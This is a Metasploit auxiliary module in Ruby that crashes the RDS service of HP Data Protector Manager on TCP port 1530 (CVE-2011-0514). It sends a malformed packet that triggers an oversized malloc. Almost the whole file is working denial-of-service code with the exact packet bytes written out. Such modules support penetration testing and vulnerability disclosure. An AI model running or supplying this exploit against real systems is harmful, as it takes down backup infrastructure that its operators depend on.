class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Data Protector Manager RDS DOS',
'Description' => %q{
This module causes a remote DOS on HP Data Protector's RDS service. By sending
a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous
size for malloc().
},
'Author' =>
[
'Roi Mallo <rmallof[at]gmail.com>',
'sinn3r',
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-0514' ],
[ 'OSVDB', '70617' ],
[ 'EDB', '15940' ],
],
'DisclosureDate' => '2011-01-08' ))
register_options([
Opt::RPORT(1530),
])
end
def run
buf = "\x23\x8c\x29\xb6"
buf << "\x64\x00\x00\x00"
buf << "\x41"*4
connect
print_status("Sending malformed packet...")
sock.put(buf)
disconnect
end
end